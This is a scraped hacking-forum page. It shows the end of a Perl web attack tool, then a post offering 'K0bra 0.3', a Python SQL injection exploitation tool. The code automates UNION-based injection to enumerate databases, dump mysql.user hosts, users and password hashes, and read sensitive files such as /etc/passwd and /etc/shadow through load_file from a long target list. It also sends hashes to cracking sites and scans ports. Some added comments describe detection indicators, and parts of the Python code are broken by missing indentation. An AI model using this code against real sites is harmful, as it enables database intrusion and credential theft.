        $total = "1";
        # The loop variable shadows the outer $rows declared above.
        for my $rows ( 2 .. 200 ) {
            $asc .=
              "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
            $total .= "," . $rows;
            $injection =
                $page . "1"
              . $pass1 . "and"
              . $pass1 . "1=0"
              . $pass1 . "union"
              . $pass1
              . "select"
              . $pass1
              . $alert
              . $asc;
            $test = toma($injection);
            if ( $test =~ /RATSXPDOWN/ ) {
                # Column numbers whose marker was reflected in the response.
                @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
                $control = 1;
                my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
                my $save = $auth;
                # Swap the first reflected column number for the "hackman"
                # placeholder that details() later splits on.
                $total =~ s/$number[0]/hackman/;
                print "[SQLI] : "
                  . $page . "1"
                  . $pass1 . "and"
                  . $pass1 . "1=0"
                  . $pass1 . "union"
                  . $pass1
                  . "select"
                  . $pass1
                  . $total . "<br>";
                details(
                    $page . "1"
                      . $pass1 . "and"
                      . $pass1 . "1=0"
                      . $pass1 . "union"
                      . $pass1
                      . "select"
                      . $pass1
                      . $total,
                    "--", ""
                );
            }
        }
    }

    # Follow-up probe called by the sub named length once a reflected column
    # is known. $page is the request template containing the "hackman"
    # placeholder; the text before and after the placeholder becomes $start and
    # $end. Four requests are sent through toma():
    #   - the marker selected FROM information_schema.tables,
    #   - the marker selected FROM mysql.user,
    #   - the marker concatenated with load_file() of a hex-encoded path,
    #   - the marker interleaved with version(), database() and user().
    # The marker is "ERTOR854", sent as char(69,82,84,79,82,56,53,52); each
    # probe counts as ON when the marker appears in the response body.
    #
    # $bypass selects the separator pair through bypass(); $save is accepted
    # but never used. $pass1, $pass2, $inforschema, $mysqluser, $test1..$test3,
    # $concat, $injection and $code are package globals.
    #
    # NOTE(review): $1..$3 are taken from the remote response and printed into
    # the HTML output without escaping.
    # Defender view: the literal strings "unhex(hex(concat(char(69,82,84,79,82,"
    # and "load_file(0x" in a query string are stable indicators of this tool
    # in request logs and are suitable for a WAF or IDS rule.
    sub details {
        my ( $page, $bypass, $save ) = @_;
        ( $pass1, $pass2 ) = &bypass($bypass);
        if ( $page =~ /(.*)hackman(.*)/ig ) {
            print "<br>[+] Searching information..<br><br>";
            my ( $start, $end ) = ( $1, $2 );
            $inforschema =
                $start
              . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
              . $end
              . $pass1 . "from"
              . $pass1
              . "information_schema.tables"
              . $pass2;
            $mysqluser =
                $start
              . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
              . $end
              . $pass1 . "from"
              . $pass1
              . "mysql.user"
              . $pass2;
            $test3 =
              toma( $start
                  . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
                  . $end
                  . $pass2 );
            $test1 = toma($inforschema);
            $test2 = toma($mysqluser);
            if ( $test2 =~ /ERTOR854/ig ) {
                print "[mysql.user] : ON<br>";
            }
            else {
                print "[mysql.user] : OFF<br>";
            }
            if ( $test1 =~ /ERTOR854/ig ) {
                print "[information_schema.tables] : ON<br>";
            }
            else {
                print "[information_schema.tables] : OFF<br>";
            }
            # Unlike the two checks above, a miss here prints nothing.
            if ( $test3 =~ /ERTOR854/ig ) {
                print "[load_file] : ON<br>";
            }
            $concat =
    "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
            $injection = $start . $concat . $end . $pass2;
            $code      = toma($injection);
            if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
                print
    "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
            }
            else {
                print "<br>[-] Not found any data<br>";
            }
        }
    }

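    # Return the argument as a "0x"-prefixed hexadecimal string, one character
    # at a time.
    #
    # Every character below 0x100 is written as exactly two digits. The
    # original "%x" emitted a single digit for values below 0x10 (tab, newline,
    # ...), which made the result ambiguous to decode. The accumulator is now
    # lexical instead of the package global $hex. An undefined argument is
    # treated as the empty string and yields "0x".
    sub encode {
        my ($string) = @_;
        $string = '' unless defined $string;

        my $hex = '0x';
        for my $char ( split //, $string ) {
            $hex .= sprintf '%02x', ord $char;
        }
        return $hex;
    }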

    sub bypass {
        if    ( $_[0] eq "/*" )  { return ( "/**/", "/**/" ); }
        elsif ( $_[0] eq "%20" ) { return ( "%20",  "%00" ); }
        else                     { return ( "+",    "--" ); }
    }

    # Return the code points of the argument as a comma-separated decimal list.
    sub ascii {
        my ($texto) = @_;
        my @codigos = unpack "U*", $texto;
        return join ',', @codigos;
    }

    # GET the given URL with the shared client $nave and return the response
    # body. The status is not inspected; an error response still returns
    # whatever body the client produced.
    sub toma {
        my ($url) = @_;
        my $respuesta = $nave->get($url);
        return $respuesta->content;
    }

    # GET the given URL with the shared client $nave and return the response
    # object itself, so callers can test is_success.
    sub tomax {
        my ($url) = @_;
        my $respuesta = $nave->get($url);
        return $respuesta;
    }

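    # Extract every link-attribute value from an HTML document.
    #
    # $_[0] - the HTML text, which comes from a remote page.
    # Returns the attribute values reported by HTML::LinkExtor for each tag,
    # in document order.
    #
    # Results are collected in a lexical array through a closure. The original
    # pushed into the package global @links from a named sub nested inside this
    # one, so the list was never reset and would keep growing across calls in
    # a persistent interpreter. eof() is called so the parser flushes any
    # buffered trailing markup.
    sub get_links {
        my ($html) = @_;

        my @found;
        my $extractor = HTML::LinkExtor->new(
            sub {
                my ( $tag, %attr ) = @_;
                push @found, values %attr;
            }
        );
        $extractor->parse($html);
        $extractor->eof;

        return @found;
    }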

    # Submit an MD5 hash to six third-party lookup sites and print any
    # cleartext that their response pattern captures.
    #
    # $_[0] - the hash, taken from the 'buscarhash' request parameter.
    #
    # %hash maps each service URL to its request type ('tipo'), the form data
    # for POST services ('variables') and the pattern applied to the response
    # ('regex'). GET services are fetched with toma() on URL . hash; POST
    # services go through tomar().
    #
    # NOTE(review): the hash is sent to every listed external host, all over
    # plain http, so anything pasted into this form is disclosed to those
    # operators and to the network path in between.
    # NOTE(review): $_[0] / $secret and the captured $1 from the remote
    # response are printed into the HTML output without escaping.
    # $code is a package global.
    sub crackit {

        my $secret = $_[0];

        print "<br><br>[+] Cracking $_[0]<br><br>";

        my %hash = (

            'http://passcracking.com/' => {
                'tipo'      => 'post',
                'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
                'regex' =>
    '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
            },
            'http://md5.hashcracking.com/search.php?md5=' => {
                'tipo'  => 'get',
                'regex' => 'Cleartext of $_[0] is (.*)',
            },
            'http://www.bigtrapeze.com/md5/' => {
                'tipo'      => 'post',
                'variables' => '{"query" => $_[0], "submit" => " Crack "}',
                'regex' =>
    'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
            },
            'http://opencrack.hashkiller.com/' => {
                'tipo' => 'post',
                'variables' =>
                  '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
                'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
            },
            'http://www.hashchecker.com/index.php?_sls=search_hash' => {
                'tipo'      => 'post',
                'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
                'regex' =>
    '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
            },
            'http://victorov.su/md5/?md5e=&md5d=' => {
                'tipo'  => 'get',
                'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
            }
        );

        # keys() order is unspecified, so the services are queried in no
        # particular order.
        for my $data ( keys %hash ) {

            if ( $hash{$data}{tipo} eq "get" ) {
                $code = toma( $data . $_[0] );
                if ( $code =~ /$hash{$data}{regex}/ig ) {
                    print "<br>[+] Decoded : " . $1 . "<br><br>";
                    print $secret. ":" . $1 . "<br>";
                }
            }
            else {
                $code = tomar( $data, $hash{$data}{variables} );
                if ( $code =~ /$hash{$data}{regex}/ig ) {
                    print $secret. ":" . $1 . "<br>";
                }
            }
        }
        print "<br>[+] Finish<br>";
    }

    # POST to $web with the shared client $nave and return the response body.
    # $var is dereferenced as a hash and flattened into the form-field list.
    sub tomar {
        my ( $web, $var ) = @_;
        my $respuesta = $nave->post( $web, [ %{$var} ] );
        return $respuesta->content;
    }

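    # TCP connect check of six fixed ports on the given host, printing one
    # line for each port that accepts a connection within 0.5 seconds.
    #
    # $_[0] - host name or address, taken from the 'buscarpuertos' request
    #         parameter.
    #
    # The host is HTML-escaped before it is echoed; the original printed the
    # raw parameter into the page. The socket is created with a direct method
    # call instead of the indirect-object form and is closed explicitly once
    # the result is known.
    #
    # NOTE(review): connections originate from the machine hosting this
    # script, towards whatever host the client names, including addresses only
    # that machine can reach. Access to the script has to be restricted at the
    # web-server level.
    sub scanuno {
        my ($host) = @_;

        my %ports = (
            "21"   => "ftp",
            "22"   => "ssh",
            "25"   => "smtp",
            "80"   => "http",
            "110"  => "pop3",
            "3306" => "mysql"
        );

        print "<br>[+] Scanning " . $que->escapeHTML($host) . "<br><br><br>";

        for my $port ( keys %ports ) {

            my $sock = IO::Socket::INET->new(
                PeerAddr => $host,
                PeerPort => $port,
                Proto    => "tcp",
                Timeout  => 0.5
            );
            next unless $sock;

            print "[Port] : "
              . $port
              . " [Service] : "
              . $ports{$port} . "<br>";
            close $sock;
        }
        print "<br><br>[+] Scan Finish<br>";
    }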

    # The End ?

#329
Scripting / [Python] K0bra 0.3
3 Diciembre 2011, 16:35 PM
Un completo scanner SQLI hecho en python

Las funciones son las siguientes

  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostrar tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados
  • Manejo de control+c

    Código (python) [Seleccionar]

    #!usr/bin/python
    #k0bra 0.3 (C) Doddy Hackman 2011

    import os,sys,urllib2,re,binascii
    from urlparse import urlparse

    files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log",
"/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","
/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MyS
QLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"]

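    def installer():
        """Create the ``logs`` directory in the current working directory.

        An OSError from mkdir (for example because the directory already
        exists) is ignored, so the call is safe to repeat.
        """
        try:
            # 0o777 is the octal spelling accepted by both Python 2.6+ and
            # Python 3; the bare 0777 form is a syntax error on Python 3.
            os.mkdir("logs", 0o777)
        except OSError:
            pass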

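    def clean():
        """Clear the terminal: run ``cls`` on win32 and ``clear`` elsewhere."""
        # The body is indented under the def so that the function parses.
        command = "cls" if sys.platform == "win32" else "clear"
        os.system(command)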

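    def savefile(name,text):
        """Append a newline followed by ``text`` to the file ``name``.

        The file is opened in append mode, so it is created when missing.
        """
        # The with-block closes the handle even if the write raises.
        with open(name, "a") as handle:
            handle.write("\n" + text)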

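    def gethost(test):
        """Return the network-location part (``host[:port]``) of the URL ``test``.

        A string without a scheme yields an empty string, because urlparse
        then treats the whole value as a path.
        """
        return urlparse(test).netloc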

    def header() :
    print ""
    print ""
    print " @      @@   @   "         
    print "@@     @  @ @@      "       
    print " @ @@  @  @  @ @   @ @ @@@ "
    print " @ @   @  @  @@ @ @@@ @  @ "
    print " @@    @  @  @  @  @   @@@ "
    print " @ @   @  @  @  @  @  @  @ "
    print "@@@ @   @@   @@@  @@@ @@@@@"
    print ""
    print ""

    def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"

    def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

    def toma(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
    op = urllib2.build_opener()
    return op.open(nave).read()

    def bypass(bypass):
    if bypass == "--":
      return("+","--")
    elif bypass == "/*":
      return("/**/","/**/")
    else:
      return("+","--")

    def reiniciar():
    copyright()
    raw_input()
    sta()

    def dumper(web,passx,table,col1,col2):

    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
    code1 = toma(web1+pass1+"from"+pass1+table+pass2)
    print "\n\n[+] Searching values\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      savefile("logs/"+gethost(web)+".txt","")
      savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n")
      print "[+] Values Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        c1 = re.findall("K0BRA(.*?)K0BRA",code2)
        c1 = c1[0]
        c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
        c2 = c2[0]
        print "["+col1+"] : "+c1
        print "["+col2+"] : "+c2+"\n"
        savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
        savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
    else:
      print "[-] Not Found\n"

    def mysqluser(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
    print "\n\n[+] Searching mysql.user\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] mysql.user : ON"
      savefile("logs/"+gethost(web)+".txt","")
      savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
      savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
      print "[+] Users Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        host = re.findall("K0BRA(.*?)K0BRA",code2)
        host = host[0]
        user = re.findall("K0BRA1(.*?)K0BRA1",code2)
        user = user[0]
        passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
        passw = passw[0]
        savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
        savefile("logs/"+gethost(web)+".txt","[User] : "+user)
        savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
        print "[Host] : "+host
        print "[User] : "+user
        print "[Pass] : "+passw+"\n"   
    else:
      print "[-] Not Found\n"


    def showcolumnsdb(web,db,table,passx):
    db2 = db
    table2 = table
    db = "0x"+str(binascii.hexlify(db))
    table = "0x"+str(binascii.hexlify(table))
    pass1,pass2 = bypass(passx)
    savefile("logs/"+gethost(web)+".txt","")
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching columns in DB\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] information_schema : ON"
      print "[+] Columns Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        column = re.findall("K0BRA(.*?)K0BRA",code2)
        column = column[0]
        savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column)
        print "[Column Found] : "+column
    else:
      print "[-] Not Found\n"


    def showtablesdb(web,db,passx):
    db2 = db
    db = "0x"+str(binascii.hexlify(db))
    pass1,pass2 = bypass(passx)
    savefile("logs/"+gethost(web)+".txt","")
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
    print "\n\n[+] Searching tables in DB\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] information_schema : ON"
      print "[+] Tables Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        table = re.findall("K0BRA(.*?)K0BRA",code2)
        table = table[0]
        print "[Table Found] : "+table
        savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table)
    else:
      print "[-] Not Found\n"

    def showtables(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
    print "\n\n[+] Searching tables\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      savefile("logs/"+gethost(web)+".txt","")
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] information_schema : ON"
      print "[+] Tables Found : ",numbers,"\n"
      for counter in range(17,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        table = re.findall("K0BRA(.*?)K0BRA",code2)
        table = table[0]
        print "[Table Found] : "+table
        savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
    else:
      print "[-] Not Found\n"

    def showcolumns(tabla,web,passx):
    pass1,pass2 = bypass(passx)
    tabla2 = tabla
    tabla = "0x"+str(binascii.hexlify(tabla))
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
    print "\n\n[+] Searching columns\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      savefile("logs/"+gethost(web)+".txt","")
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] information_schema : ON"
      print "[+] Columns Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        column = re.findall("K0BRA(.*?)K0BRA",code2)
        column = column[0]
        print "[Column Found in table "+tabla2+"] : "+column
        savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column)
    else:
      print "[-] Not Found\n"


    def showdbs(web,passx):
    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
    code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
    print "\n\n[+] Searching DBS\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      savefile("logs/"+gethost(web)+".txt","")
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] information_schema : ON"
      print "[+] DBS Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        db = re.findall("K0BRA(.*?)K0BRA",code2)
        db = db[0]
        print "[DB Found] : "+db
        savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
    else:
      print "[-] Not Found\n"

    def men():
    print "\n[+] Press any key to continue\n"
    raw_input()   
    menu(page,bypass)

    # For every path in the module-level `files` list: hex-encode the path,
    # substitute a load_file(<hex>) expression wrapped in "k0bra" markers for the
    # "hackman" placeholder in `web`, fetch the resulting URL with toma(), and
    # print/log whatever the response carries between the two markers.
